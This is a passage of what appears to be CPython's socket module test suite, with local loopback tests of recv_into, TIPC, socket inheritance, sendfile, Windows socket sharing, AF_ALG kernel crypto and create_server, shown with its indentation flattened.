SocketConnectedTest.__init__(self, methodName=methodName)
def testRecvIntoArray(self):
buf = array.array("B", [0] * len(MSG))
nbytes = self.cli_conn.recv_into(buf)
self.assertEqual(nbytes, len(MSG))
buf = buf.tobytes()
msg = buf[:len(MSG)]
self.assertEqual(msg, MSG)
def _testRecvIntoArray(self):
buf = bytes(MSG)
self.serv_conn.send(buf)
def testRecvIntoBytearray(self):
buf = bytearray(1024)
nbytes = self.cli_conn.recv_into(buf)
self.assertEqual(nbytes, len(MSG))
msg = buf[:len(MSG)]
self.assertEqual(msg, MSG)
_testRecvIntoBytearray = _testRecvIntoArray
def testRecvIntoMemoryview(self):
buf = bytearray(1024)
nbytes = self.cli_conn.recv_into(memoryview(buf))
self.assertEqual(nbytes, len(MSG))
msg = buf[:len(MSG)]
self.assertEqual(msg, MSG)
_testRecvIntoMemoryview = _testRecvIntoArray
def testRecvFromIntoArray(self):
buf = array.array("B", [0] * len(MSG))
nbytes, addr = self.cli_conn.recvfrom_into(buf)
self.assertEqual(nbytes, len(MSG))
buf = buf.tobytes()
msg = buf[:len(MSG)]
self.assertEqual(msg, MSG)
def _testRecvFromIntoArray(self):
buf = bytes(MSG)
self.serv_conn.send(buf)
def testRecvFromIntoBytearray(self):
buf = bytearray(1024)
nbytes, addr = self.cli_conn.recvfrom_into(buf)
self.assertEqual(nbytes, len(MSG))
msg = buf[:len(MSG)]
self.assertEqual(msg, MSG)
_testRecvFromIntoBytearray = _testRecvFromIntoArray
def testRecvFromIntoMemoryview(self):
buf = bytearray(1024)
nbytes, addr = self.cli_conn.recvfrom_into(memoryview(buf))
self.assertEqual(nbytes, len(MSG))
msg = buf[:len(MSG)]
self.assertEqual(msg, MSG)
_testRecvFromIntoMemoryview = _testRecvFromIntoArray
def testRecvFromIntoSmallBuffer(self):
# See issue #20246.
buf = bytearray(8)
self.assertRaises(ValueError, self.cli_conn.recvfrom_into, buf, 1024)
def _testRecvFromIntoSmallBuffer(self):
self.serv_conn.send(MSG)
def testRecvFromIntoEmptyBuffer(self):
buf = bytearray()
self.cli_conn.recvfrom_into(buf)
self.cli_conn.recvfrom_into(buf, 0)
_testRecvFromIntoEmptyBuffer = _testRecvFromIntoArray
TIPC_STYPE = 2000
TIPC_LOWER = 200
TIPC_UPPER = 210
def isTipcAvailable():
"""Check if the TIPC module is loaded
The TIPC module is not loaded automatically on Ubuntu and probably
other Linux distros.
"""
if not hasattr(socket, "AF_TIPC"):
return False
try:
f = open("/proc/modules", encoding="utf-8")
except (FileNotFoundError, IsADirectoryError, PermissionError):
# It's ok if the file does not exist, is a directory or if we
# have not the permission to read it.
return False
with f:
for line in f:
if line.startswith("tipc "):
return True
return False
@unittest.skipUnless(isTipcAvailable(),
"TIPC module is not loaded, please 'sudo modprobe tipc'")
class TIPCTest(unittest.TestCase):
def testRDM(self):
srv = socket.socket(socket.AF_TIPC, socket.SOCK_RDM)
cli = socket.socket(socket.AF_TIPC, socket.SOCK_RDM)
self.addCleanup(srv.close)
self.addCleanup(cli.close)
srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
srvaddr = (socket.TIPC_ADDR_NAMESEQ, TIPC_STYPE,
TIPC_LOWER, TIPC_UPPER)
srv.bind(srvaddr)
sendaddr = (socket.TIPC_ADDR_NAME, TIPC_STYPE,
TIPC_LOWER + int((TIPC_UPPER - TIPC_LOWER) / 2), 0)
cli.sendto(MSG, sendaddr)
msg, recvaddr = srv.recvfrom(1024)
self.assertEqual(cli.getsockname(), recvaddr)
self.assertEqual(msg, MSG)
@unittest.skipUnless(isTipcAvailable(),
"TIPC module is not loaded, please 'sudo modprobe tipc'")
class TIPCThreadableTest(unittest.TestCase, ThreadableTest):
def __init__(self, methodName = 'runTest'):
unittest.TestCase.__init__(self, methodName = methodName)
ThreadableTest.__init__(self)
def setUp(self):
self.srv = socket.socket(socket.AF_TIPC, socket.SOCK_STREAM)
self.addCleanup(self.srv.close)
self.srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
srvaddr = (socket.TIPC_ADDR_NAMESEQ, TIPC_STYPE,
TIPC_LOWER, TIPC_UPPER)
self.srv.bind(srvaddr)
self.srv.listen()
self.serverExplicitReady()
self.conn, self.connaddr = self.srv.accept()
self.addCleanup(self.conn.close)
def clientSetUp(self):
# There is a hittable race between serverExplicitReady() and the
# accept() call; sleep a little while to avoid it, otherwise
# we could get an exception
time.sleep(0.1)
self.cli = socket.socket(socket.AF_TIPC, socket.SOCK_STREAM)
self.addCleanup(self.cli.close)
addr = (socket.TIPC_ADDR_NAME, TIPC_STYPE,
TIPC_LOWER + int((TIPC_UPPER - TIPC_LOWER) / 2), 0)
self.cli.connect(addr)
self.cliaddr = self.cli.getsockname()
def testStream(self):
msg = self.conn.recv(1024)
self.assertEqual(msg, MSG)
self.assertEqual(self.cliaddr, self.connaddr)
def _testStream(self):
self.cli.send(MSG)
self.cli.close()
class ContextManagersTest(ThreadedTCPSocketTest):
def _testSocketClass(self):
# base test
with socket.socket() as sock:
self.assertFalse(sock._closed)
self.assertTrue(sock._closed)
# close inside with block
with socket.socket() as sock:
sock.close()
self.assertTrue(sock._closed)
# exception inside with block
with socket.socket() as sock:
self.assertRaises(OSError, sock.sendall, b'foo')
self.assertTrue(sock._closed)
def testCreateConnectionBase(self):
conn, addr = self.serv.accept()
self.addCleanup(conn.close)
data = conn.recv(1024)
conn.sendall(data)
def _testCreateConnectionBase(self):
address = self.serv.getsockname()
with socket.create_connection(address) as sock:
self.assertFalse(sock._closed)
sock.sendall(b'foo')
self.assertEqual(sock.recv(1024), b'foo')
self.assertTrue(sock._closed)
def testCreateConnectionClose(self):
conn, addr = self.serv.accept()
self.addCleanup(conn.close)
data = conn.recv(1024)
conn.sendall(data)
def _testCreateConnectionClose(self):
address = self.serv.getsockname()
with socket.create_connection(address) as sock:
sock.close()
self.assertTrue(sock._closed)
self.assertRaises(OSError, sock.sendall, b'foo')
class InheritanceTest(unittest.TestCase):
@unittest.skipUnless(hasattr(socket, "SOCK_CLOEXEC"),
"SOCK_CLOEXEC not defined")
@support.requires_linux_version(2, 6, 28)
def test_SOCK_CLOEXEC(self):
with socket.socket(socket.AF_INET,
socket.SOCK_STREAM | socket.SOCK_CLOEXEC) as s:
self.assertEqual(s.type, socket.SOCK_STREAM)
self.assertFalse(s.get_inheritable())
def test_default_inheritable(self):
sock = socket.socket()
with sock:
self.assertEqual(sock.get_inheritable(), False)
def test_dup(self):
sock = socket.socket()
with sock:
newsock = sock.dup()
sock.close()
with newsock:
self.assertEqual(newsock.get_inheritable(), False)
def test_set_inheritable(self):
sock = socket.socket()
with sock:
sock.set_inheritable(True)
self.assertEqual(sock.get_inheritable(), True)
sock.set_inheritable(False)
self.assertEqual(sock.get_inheritable(), False)
@unittest.skipIf(fcntl is None, "need fcntl")
def test_get_inheritable_cloexec(self):
sock = socket.socket()
with sock:
fd = sock.fileno()
self.assertEqual(sock.get_inheritable(), False)
# clear FD_CLOEXEC flag
flags = fcntl.fcntl(fd, fcntl.F_GETFD)
flags &= ~fcntl.FD_CLOEXEC
fcntl.fcntl(fd, fcntl.F_SETFD, flags)
self.assertEqual(sock.get_inheritable(), True)
@unittest.skipIf(fcntl is None, "need fcntl")
def test_set_inheritable_cloexec(self):
sock = socket.socket()
with sock:
fd = sock.fileno()
self.assertEqual(fcntl.fcntl(fd, fcntl.F_GETFD) & fcntl.FD_CLOEXEC,
fcntl.FD_CLOEXEC)
sock.set_inheritable(True)
self.assertEqual(fcntl.fcntl(fd, fcntl.F_GETFD) & fcntl.FD_CLOEXEC,
0)
def test_socketpair(self):
s1, s2 = socket.socketpair()
self.addCleanup(s1.close)
self.addCleanup(s2.close)
self.assertEqual(s1.get_inheritable(), False)
self.assertEqual(s2.get_inheritable(), False)
@unittest.skipUnless(hasattr(socket, "SOCK_NONBLOCK"),
"SOCK_NONBLOCK not defined")
class NonblockConstantTest(unittest.TestCase):
def checkNonblock(self, s, nonblock=True, timeout=0.0):
if nonblock:
self.assertEqual(s.type, socket.SOCK_STREAM)
self.assertEqual(s.gettimeout(), timeout)
self.assertTrue(
fcntl.fcntl(s, fcntl.F_GETFL, os.O_NONBLOCK) & os.O_NONBLOCK)
if timeout == 0:
# timeout == 0: means that getblocking() must be False.
self.assertFalse(s.getblocking())
else:
# If timeout > 0, the socket will be in a "blocking" mode
# from the standpoint of the Python API. For Python socket
# object, "blocking" means that operations like 'sock.recv()'
# will block. Internally, file descriptors for
# "blocking" Python sockets *with timeouts* are in a
# *non-blocking* mode, and 'sock.recv()' uses 'select()'
# and handles EWOULDBLOCK/EAGAIN to enforce the timeout.
self.assertTrue(s.getblocking())
else:
self.assertEqual(s.type, socket.SOCK_STREAM)
self.assertEqual(s.gettimeout(), None)
self.assertFalse(
fcntl.fcntl(s, fcntl.F_GETFL, os.O_NONBLOCK) & os.O_NONBLOCK)
self.assertTrue(s.getblocking())
@support.requires_linux_version(2, 6, 28)
def test_SOCK_NONBLOCK(self):
# a lot of it seems silly and redundant, but I wanted to test that
# changing back and forth worked ok
with socket.socket(socket.AF_INET,
socket.SOCK_STREAM | socket.SOCK_NONBLOCK) as s:
self.checkNonblock(s)
s.setblocking(True)
self.checkNonblock(s, nonblock=False)
s.setblocking(False)
self.checkNonblock(s)
s.settimeout(None)
self.checkNonblock(s, nonblock=False)
s.settimeout(2.0)
self.checkNonblock(s, timeout=2.0)
s.setblocking(True)
self.checkNonblock(s, nonblock=False)
# defaulttimeout
t = socket.getdefaulttimeout()
socket.setdefaulttimeout(0.0)
with socket.socket() as s:
self.checkNonblock(s)
socket.setdefaulttimeout(None)
with socket.socket() as s:
self.checkNonblock(s, False)
socket.setdefaulttimeout(2.0)
with socket.socket() as s:
self.checkNonblock(s, timeout=2.0)
socket.setdefaulttimeout(None)
with socket.socket() as s:
self.checkNonblock(s, False)
socket.setdefaulttimeout(t)
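# Editor-added sketch (not part of the original test suite): a compact, hedged
# illustration of the timeout/blocking mapping described in checkNonblock() above.
def _timeout_blocking_sketch():
    with socket.socket() as s:
        s.settimeout(0.0)    # timeout == 0 -> non-blocking
        assert s.getblocking() is False and s.gettimeout() == 0.0
        s.settimeout(2.0)    # positive timeout -> "blocking" from the Python API's standpoint
        assert s.getblocking() is True and s.gettimeout() == 2.0
        s.settimeout(None)   # None -> blocking with no timeout
        assert s.getblocking() is True and s.gettimeout() is None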
@unittest.skipUnless(os.name == "nt", "Windows specific")
@unittest.skipUnless(multiprocessing, "need multiprocessing")
class TestSocketSharing(SocketTCPTest):
# This must be classmethod and not staticmethod or multiprocessing
# won't be able to bootstrap it.
@classmethod
def remoteProcessServer(cls, q):
# Recreate socket from shared data
sdata = q.get()
message = q.get()
s = socket.fromshare(sdata)
s2, c = s.accept()
# Send the message
s2.sendall(message)
s2.close()
s.close()
def testShare(self):
# Transfer the listening server socket to another process
# and service it from there.
# Create process:
q = multiprocessing.Queue()
p = multiprocessing.Process(target=self.remoteProcessServer, args=(q,))
p.start()
# Get the shared socket data
data = self.serv.share(p.pid)
# Pass the shared socket to the other process
addr = self.serv.getsockname()
self.serv.close()
q.put(data)
# The data that the server will send us
message = b"slapmahfro"
q.put(message)
# Connect
s = socket.create_connection(addr)
# listen for the data
m = []
while True:
data = s.recv(100)
if not data:
break
m.append(data)
s.close()
received = b"".join(m)
self.assertEqual(received, message)
p.join()
def testShareLength(self):
data = self.serv.share(os.getpid())
self.assertRaises(ValueError, socket.fromshare, data[:-1])
self.assertRaises(ValueError, socket.fromshare, data+b"foo")
def compareSockets(self, org, other):
# socket sharing is expected to work only for blocking socket
# since the internal python timeout value isn't transferred.
self.assertEqual(org.gettimeout(), None)
self.assertEqual(org.gettimeout(), other.gettimeout())
self.assertEqual(org.family, other.family)
self.assertEqual(org.type, other.type)
# If the user specified "0" for proto, then
# internally windows will have picked the correct value.
# Python introspection on the socket however will still return
# 0. For the shared socket, the python value is recreated
# from the actual value, so it may not compare correctly.
if org.proto != 0:
self.assertEqual(org.proto, other.proto)
def testShareLocal(self):
data = self.serv.share(os.getpid())
s = socket.fromshare(data)
try:
self.compareSockets(self.serv, s)
finally:
s.close()
def testTypes(self):
families = [socket.AF_INET, socket.AF_INET6]
types = [socket.SOCK_STREAM, socket.SOCK_DGRAM]
for f in families:
for t in types:
try:
source = socket.socket(f, t)
except OSError:
continue # This combination is not supported
try:
data = source.share(os.getpid())
shared = socket.fromshare(data)
try:
self.compareSockets(source, shared)
finally:
shared.close()
finally:
source.close()
class SendfileUsingSendTest(ThreadedTCPSocketTest):
"""
Test the send() implementation of socket.sendfile().
"""
FILESIZE = (10 * 1024 * 1024) # 10 MiB
BUFSIZE = 8192
FILEDATA = b""
TIMEOUT = support.LOOPBACK_TIMEOUT
@classmethod
def setUpClass(cls):
def chunks(total, step):
assert total >= step
while total > step:
yield step
total -= step
if total:
yield total
chunk = b"".join([random.choice(string.ascii_letters).encode()
for i in range(cls.BUFSIZE)])
with open(os_helper.TESTFN, 'wb') as f:
for csize in chunks(cls.FILESIZE, cls.BUFSIZE):
f.write(chunk)
with open(os_helper.TESTFN, 'rb') as f:
cls.FILEDATA = f.read()
assert len(cls.FILEDATA) == cls.FILESIZE
@classmethod
def tearDownClass(cls):
os_helper.unlink(os_helper.TESTFN)
def accept_conn(self):
self.serv.settimeout(support.LONG_TIMEOUT)
conn, addr = self.serv.accept()
conn.settimeout(self.TIMEOUT)
self.addCleanup(conn.close)
return conn
def recv_data(self, conn):
received = []
while True:
chunk = conn.recv(self.BUFSIZE)
if not chunk:
break
received.append(chunk)
return b''.join(received)
def meth_from_sock(self, sock):
# Depending on the mixin class being run return either send()
# or sendfile() method implementation.
return getattr(sock, "_sendfile_use_send")
# regular file
def _testRegularFile(self):
address = self.serv.getsockname()
file = open(os_helper.TESTFN, 'rb')
with socket.create_connection(address) as sock, file as file:
meth = self.meth_from_sock(sock)
sent = meth(file)
self.assertEqual(sent, self.FILESIZE)
self.assertEqual(file.tell(), self.FILESIZE)
def testRegularFile(self):
conn = self.accept_conn()
data = self.recv_data(conn)
self.assertEqual(len(data), self.FILESIZE)
self.assertEqual(data, self.FILEDATA)
# non regular file
def _testNonRegularFile(self):
address = self.serv.getsockname()
file = io.BytesIO(self.FILEDATA)
with socket.create_connection(address) as sock, file as file:
sent = sock.sendfile(file)
self.assertEqual(sent, self.FILESIZE)
self.assertEqual(file.tell(), self.FILESIZE)
self.assertRaises(socket._GiveupOnSendfile,
sock._sendfile_use_sendfile, file)
def testNonRegularFile(self):
conn = self.accept_conn()
data = self.recv_data(conn)
self.assertEqual(len(data), self.FILESIZE)
self.assertEqual(data, self.FILEDATA)
# empty file
def _testEmptyFileSend(self):
address = self.serv.getsockname()
filename = os_helper.TESTFN + "2"
with open(filename, 'wb'):
self.addCleanup(os_helper.unlink, filename)
file = open(filename, 'rb')
with socket.create_connection(address) as sock, file as file:
meth = self.meth_from_sock(sock)
sent = meth(file)
self.assertEqual(sent, 0)
self.assertEqual(file.tell(), 0)
def testEmptyFileSend(self):
conn = self.accept_conn()
data = self.recv_data(conn)
self.assertEqual(data, b"")
# offset
def _testOffset(self):
address = self.serv.getsockname()
file = open(os_helper.TESTFN, 'rb')
with socket.create_connection(address) as sock, file as file:
meth = self.meth_from_sock(sock)
sent = meth(file, offset=5000)
self.assertEqual(sent, self.FILESIZE - 5000)
self.assertEqual(file.tell(), self.FILESIZE)
def testOffset(self):
conn = self.accept_conn()
data = self.recv_data(conn)
self.assertEqual(len(data), self.FILESIZE - 5000)
self.assertEqual(data, self.FILEDATA[5000:])
# count
def _testCount(self):
address = self.serv.getsockname()
file = open(os_helper.TESTFN, 'rb')
sock = socket.create_connection(address,
timeout=support.LOOPBACK_TIMEOUT)
with sock, file:
count = 5000007
meth = self.meth_from_sock(sock)
sent = meth(file, count=count)
self.assertEqual(sent, count)
self.assertEqual(file.tell(), count)
def testCount(self):
count = 5000007
conn = self.accept_conn()
data = self.recv_data(conn)
self.assertEqual(len(data), count)
self.assertEqual(data, self.FILEDATA[:count])
# count small
def _testCountSmall(self):
address = self.serv.getsockname()
file = open(os_helper.TESTFN, 'rb')
sock = socket.create_connection(address,
timeout=support.LOOPBACK_TIMEOUT)
with sock, file:
count = 1
meth = self.meth_from_sock(sock)
sent = meth(file, count=count)
self.assertEqual(sent, count)
self.assertEqual(file.tell(), count)
def testCountSmall(self):
count = 1
conn = self.accept_conn()
data = self.recv_data(conn)
self.assertEqual(len(data), count)
self.assertEqual(data, self.FILEDATA[:count])
# count + offset
def _testCountWithOffset(self):
address = self.serv.getsockname()
file = open(os_helper.TESTFN, 'rb')
with socket.create_connection(address, timeout=2) as sock, file as file:
count = 100007
meth = self.meth_from_sock(sock)
sent = meth(file, offset=2007, count=count)
self.assertEqual(sent, count)
self.assertEqual(file.tell(), count + 2007)
def testCountWithOffset(self):
count = 100007
conn = self.accept_conn()
data = self.recv_data(conn)
self.assertEqual(len(data), count)
self.assertEqual(data, self.FILEDATA[2007:count+2007])
# non blocking sockets are not supposed to work
def _testNonBlocking(self):
address = self.serv.getsockname()
file = open(os_helper.TESTFN, 'rb')
with socket.create_connection(address) as sock, file as file:
sock.setblocking(False)
meth = self.meth_from_sock(sock)
self.assertRaises(ValueError, meth, file)
self.assertRaises(ValueError, sock.sendfile, file)
def testNonBlocking(self):
conn = self.accept_conn()
if conn.recv(8192):
self.fail('was not supposed to receive any data')
# timeout (non-triggered)
def _testWithTimeout(self):
address = self.serv.getsockname()
file = open(os_helper.TESTFN, 'rb')
sock = socket.create_connection(address,
timeout=support.LOOPBACK_TIMEOUT)
with sock, file:
meth = self.meth_from_sock(sock)
sent = meth(file)
self.assertEqual(sent, self.FILESIZE)
def testWithTimeout(self):
conn = self.accept_conn()
data = self.recv_data(conn)
self.assertEqual(len(data), self.FILESIZE)
self.assertEqual(data, self.FILEDATA)
# timeout (triggered)
def _testWithTimeoutTriggeredSend(self):
address = self.serv.getsockname()
with open(os_helper.TESTFN, 'rb') as file:
with socket.create_connection(address) as sock:
sock.settimeout(0.01)
meth = self.meth_from_sock(sock)
self.assertRaises(TimeoutError, meth, file)
def testWithTimeoutTriggeredSend(self):
conn = self.accept_conn()
conn.recv(88192)
# bpo-45212: the wait here needs to be longer than the client-side timeout (0.01s)
time.sleep(1)
# errors
def _test_errors(self):
pass
def test_errors(self):
with open(os_helper.TESTFN, 'rb') as file:
with socket.socket(type=socket.SOCK_DGRAM) as s:
meth = self.meth_from_sock(s)
self.assertRaisesRegex(
ValueError, "SOCK_STREAM", meth, file)
with open(os_helper.TESTFN, encoding="utf-8") as file:
with socket.socket() as s:
meth = self.meth_from_sock(s)
self.assertRaisesRegex(
ValueError, "binary mode", meth, file)
with open(os_helper.TESTFN, 'rb') as file:
with socket.socket() as s:
meth = self.meth_from_sock(s)
self.assertRaisesRegex(TypeError, "positive integer",
meth, file, count='2')
self.assertRaisesRegex(TypeError, "positive integer",
meth, file, count=0.1)
self.assertRaisesRegex(ValueError, "positive integer",
meth, file, count=0)
self.assertRaisesRegex(ValueError, "positive integer",
meth, file, count=-1)
@unittest.skipUnless(hasattr(os, "sendfile"),
'os.sendfile() required for this test.')
class SendfileUsingSendfileTest(SendfileUsingSendTest):
"""
Test the sendfile() implementation of socket.sendfile().
"""
def meth_from_sock(self, sock):
return getattr(sock, "_sendfile_use_sendfile")
@unittest.skipUnless(HAVE_SOCKET_ALG, 'AF_ALG required')
class LinuxKernelCryptoAPI(unittest.TestCase):
# tests for AF_ALG
def create_alg(self, typ, name):
sock = socket.socket(socket.AF_ALG, socket.SOCK_SEQPACKET, 0)
try:
sock.bind((typ, name))
except FileNotFoundError as e:
# type / algorithm is not available
sock.close()
raise unittest.SkipTest(str(e), typ, name)
else:
return sock
# bpo-31705: On kernel older than 4.5, sendto() failed with ENOKEY,
# at least on ppc64le architecture
@support.requires_linux_version(4, 5)
def test_sha256(self):
expected = bytes.fromhex("ba7816bf8f01cfea414140de5dae2223b00361a396"
"177a9cb410ff61f20015ad")
with self.create_alg('hash', 'sha256') as algo:
op, _ = algo.accept()
with op:
op.sendall(b"abc")
self.assertEqual(op.recv(512), expected)
op, _ = algo.accept()
with op:
op.send(b'a', socket.MSG_MORE)
op.send(b'b', socket.MSG_MORE)
op.send(b'c', socket.MSG_MORE)
op.send(b'')
self.assertEqual(op.recv(512), expected)
def test_hmac_sha1(self):
expected = bytes.fromhex("effcdf6ae5eb2fa2d27416d5f184df9c259a7c79")
with self.create_alg('hash', 'hmac(sha1)') as algo:
algo.setsockopt(socket.SOL_ALG, socket.ALG_SET_KEY, b"Jefe")
op, _ = algo.accept()
with op:
op.sendall(b"what do ya want for nothing?")
self.assertEqual(op.recv(512), expected)
# Although it should work with 3.19 and newer the test blocks on
# Ubuntu 15.10 with Kernel 4.2.0-19.
@support.requires_linux_version(4, 3)
def test_aes_cbc(self):
key = bytes.fromhex('06a9214036b8a15b512e03d534120006')
iv = bytes.fromhex('3dafba429d9eb430b422da802c9fac41')
msg = b"Single block msg"
ciphertext = bytes.fromhex('e353779c1079aeb82708942dbe77181a')
msglen = len(msg)
with self.create_alg('skcipher', 'cbc(aes)') as algo:
algo.setsockopt(socket.SOL_ALG, socket.ALG_SET_KEY, key)
op, _ = algo.accept()
with op:
op.sendmsg_afalg(op=socket.ALG_OP_ENCRYPT, iv=iv,
flags=socket.MSG_MORE)
op.sendall(msg)
self.assertEqual(op.recv(msglen), ciphertext)
op, _ = algo.accept()
with op:
op.sendmsg_afalg([ciphertext],
op=socket.ALG_OP_DECRYPT, iv=iv)
self.assertEqual(op.recv(msglen), msg)
# long message
multiplier = 1024
longmsg = [msg] * multiplier
op, _ = algo.accept()
with op:
op.sendmsg_afalg(longmsg,
op=socket.ALG_OP_ENCRYPT, iv=iv)
enc = op.recv(msglen * multiplier)
self.assertEqual(len(enc), msglen * multiplier)
self.assertEqual(enc[:msglen], ciphertext)
op, _ = algo.accept()
with op:
op.sendmsg_afalg([enc],
op=socket.ALG_OP_DECRYPT, iv=iv)
dec = op.recv(msglen * multiplier)
self.assertEqual(len(dec), msglen * multiplier)
self.assertEqual(dec, msg * multiplier)
@support.requires_linux_version(4, 9) # see issue29324
def test_aead_aes_gcm(self):
key = bytes.fromhex('c939cc13397c1d37de6ae0e1cb7c423c')
iv = bytes.fromhex('b3d8cc017cbb89b39e0f67e2')
plain = bytes.fromhex('c3b3c41f113a31b73d9a5cd432103069')
assoc = bytes.fromhex('24825602bd12a984e0092d3e448eda5f')
expected_ct = bytes.fromhex('93fe7d9e9bfd10348a5606e5cafa7354')
expected_tag = bytes.fromhex('0032a1dc85f1c9786925a2e71d8272dd')
taglen = len(expected_tag)
assoclen = len(assoc)
with self.create_alg('aead', 'gcm(aes)') as algo:
algo.setsockopt(socket.SOL_ALG, socket.ALG_SET_KEY, key)
algo.setsockopt(socket.SOL_ALG, socket.ALG_SET_AEAD_AUTHSIZE,
None, taglen)
# send assoc, plain and tag buffer in separate steps
op, _ = algo.accept()
with op:
op.sendmsg_afalg(op=socket.ALG_OP_ENCRYPT, iv=iv,
assoclen=assoclen, flags=socket.MSG_MORE)
op.sendall(assoc, socket.MSG_MORE)
op.sendall(plain)
res = op.recv(assoclen + len(plain) + taglen)
self.assertEqual(expected_ct, res[assoclen:-taglen])
self.assertEqual(expected_tag, res[-taglen:])
# now with msg
op, _ = algo.accept()
with op:
msg = assoc + plain
op.sendmsg_afalg([msg], op=socket.ALG_OP_ENCRYPT, iv=iv,
assoclen=assoclen)
res = op.recv(assoclen + len(plain) + taglen)
self.assertEqual(expected_ct, res[assoclen:-taglen])
self.assertEqual(expected_tag, res[-taglen:])
# create anc data manually
pack_uint32 = struct.Struct('I').pack
op, _ = algo.accept()
with op:
msg = assoc + plain
op.sendmsg(
[msg],
([socket.SOL_ALG, socket.ALG_SET_OP, pack_uint32(socket.ALG_OP_ENCRYPT)],
[socket.SOL_ALG, socket.ALG_SET_IV, pack_uint32(len(iv)) + iv],
[socket.SOL_ALG, socket.ALG_SET_AEAD_ASSOCLEN, pack_uint32(assoclen)],
)
)
res = op.recv(len(msg) + taglen)
self.assertEqual(expected_ct, res[assoclen:-taglen])
self.assertEqual(expected_tag, res[-taglen:])
# decrypt and verify
op, _ = algo.accept()
with op:
msg = assoc + expected_ct + expected_tag
op.sendmsg_afalg([msg], op=socket.ALG_OP_DECRYPT, iv=iv,
assoclen=assoclen)
res = op.recv(len(msg) - taglen)
self.assertEqual(plain, res[assoclen:])
@support.requires_linux_version(4, 3) # see test_aes_cbc
def test_drbg_pr_sha256(self):
# deterministic random bit generator, prediction resistance, sha256
with self.create_alg('rng', 'drbg_pr_sha256') as algo:
extra_seed = os.urandom(32)
algo.setsockopt(socket.SOL_ALG, socket.ALG_SET_KEY, extra_seed)
op, _ = algo.accept()
with op:
rn = op.recv(32)
self.assertEqual(len(rn), 32)
def test_sendmsg_afalg_args(self):
sock = socket.socket(socket.AF_ALG, socket.SOCK_SEQPACKET, 0)
with sock:
with self.assertRaises(TypeError):
sock.sendmsg_afalg()
with self.assertRaises(TypeError):
sock.sendmsg_afalg(op=None)
with self.assertRaises(TypeError):
sock.sendmsg_afalg(1)
with self.assertRaises(TypeError):
sock.sendmsg_afalg(op=socket.ALG_OP_ENCRYPT, assoclen=None)
with self.assertRaises(TypeError):
sock.sendmsg_afalg(op=socket.ALG_OP_ENCRYPT, assoclen=-1)
def test_length_restriction(self):
# bpo-35050, off-by-one error in length check
sock = socket.socket(socket.AF_ALG, socket.SOCK_SEQPACKET, 0)
self.addCleanup(sock.close)
# salg_type[14]
with self.assertRaises(FileNotFoundError):
sock.bind(("t" * 13, "name"))
with self.assertRaisesRegex(ValueError, "type too long"):
sock.bind(("t" * 14, "name"))
# salg_name[64]
with self.assertRaises(FileNotFoundError):
sock.bind(("type", "n" * 63))
with self.assertRaisesRegex(ValueError, "name too long"):
sock.bind(("type", "n" * 64))
@unittest.skipUnless(sys.platform == 'darwin', 'macOS specific test')
class TestMacOSTCPFlags(unittest.TestCase):
def test_tcp_keepalive(self):
self.assertTrue(socket.TCP_KEEPALIVE)
@unittest.skipUnless(sys.platform.startswith("win"), "requires Windows")
class TestMSWindowsTCPFlags(unittest.TestCase):
knownTCPFlags = {
# available since long time ago
'TCP_MAXSEG',
'TCP_NODELAY',
# available starting with Windows 10 1607
'TCP_FASTOPEN',
# available starting with Windows 10 1703
'TCP_KEEPCNT',
# available starting with Windows 10 1709
'TCP_KEEPIDLE',
'TCP_KEEPINTVL'
}
def test_new_tcp_flags(self):
provided = [s for s in dir(socket) if s.startswith('TCP')]
unknown = [s for s in provided if s not in self.knownTCPFlags]
self.assertEqual([], unknown,
"New TCP flags were discovered. See bpo-32394 for more information")
class CreateServerTest(unittest.TestCase):
def test_address(self):
port = socket_helper.find_unused_port()
with socket.create_server(("127.0.0.1", port)) as sock:
self.assertEqual(sock.getsockname()[0], "127.0.0.1")
self.assertEqual(sock.getsockname()[1], port)
if socket_helper.IPV6_ENABLED:
with socket.create_server(("::1", port),
family=socket.AF_INET6) as sock:
self.assertEqual(sock.getsockname()[0], "::1")
self.assertEqual(sock.getsockname()[1], port)
def test_family_and_type(self):
with socket.create_server(("127.0.0.1", 0)) as sock:
self.assertEqual(sock.family, socket.AF_INET)
self.assertEqual(sock.type, socket.SOCK_STREAM)
if socket_helper.IPV6_ENABLED:
with socket.create_server(("::1", 0), family=socket.AF_INET6) as s:
self.assertEqual(s.family, socket.AF_INET6)
                self.assertEqual(s.type, socket.SOCK_STREAM)
def test_reuse_port(self):
if not hasattr(socket, "SO_REUSEPORT"):
with self.assertRaises(ValueError):
socket.create_server(("localhost", 0), reuse_port=True)
else:
with socket.create_server(("localhost", 0)) as sock:
opt = sock.getsockopt(socket.SOL_SOCKET, socket.SO_REUSEPORT)
self.assertEqual(opt, 0)
with socket.create_server(("localhost", 0), reuse_port=True) as sock:
opt = sock.getsockopt(socket.SOL_SOCKET, socket.SO_REUSEPORT)
self.assertNotEqual(opt, 0)
@unittest.skipIf(not hasattr(_socket, 'IPPROTO_IPV6') or
not hasattr(_socket, 'IPV6_V6ONLY'),
"IPV6_V6ONLY option not supported")
@unittest.skipUnless(socket_helper.IPV6_ENABLED, 'IPv6 required for this test')
def test_ipv6_only_default(self):
with socket.create_server(("::1", 0), family=socket.AF_INET6) as sock:
assert sock.getsockopt(socket.IPPROTO_IPV6, socket.IPV6_V6ONLY)
@unittest.skipIf(not socket.has_dualstack_ipv6(),
"dualstack_ipv6 not supported")
@unittest.skipUnless(socket_helper.IPV6_ENABLED, 'IPv6 required for this test')
def test_dualstack_ipv6_family(self):
with socket.create_server(("::1", 0), family=socket.AF_INET6,
dualstack_ipv6=True) as sock:
self.assertEqual(sock.family, socket.AF_INET6)
class CreateServerFunctionalTest(unittest.TestCase):
timeout = support.LOOPBACK_TIMEOUT
def echo_server(self, sock):
def run(sock):
with sock:
conn, _ = sock.accept()
with conn:
event.wait(self.timeout)
msg = conn.recv(1024)
if not msg:
return
conn.sendall(msg)
event = threading.Event()
sock.settimeout(self.timeout)
thread = threading.Thread(target=run, args=(sock, ))
thread.start()
self.addCleanup(thread.join, self.timeout)
event.set()
def echo_client(self, addr, family):
with socket.socket(family=family) as sock:
sock.settimeout(self.timeout)
sock.connect(addr)
sock.sendall(b'foo')
self.assertEqual(sock.recv(1024), b'foo')
def test_tcp4(self):
port = socket_helper.find_unused_port()
with socket.create_server(("", port)) as sock:
self.echo_server(sock)
self.echo_client(("127.0.0.1", port), socket.AF_INET)
@unittest.skipUnless(socket_helper.IPV6_ENABLED, 'IPv6 required for this test')
def test_tcp6(self):
port = socket_helper.find_unused_port()
with socket.create_server(("", port),
family=socket.AF_INET6) as sock:
self.echo_server(sock)
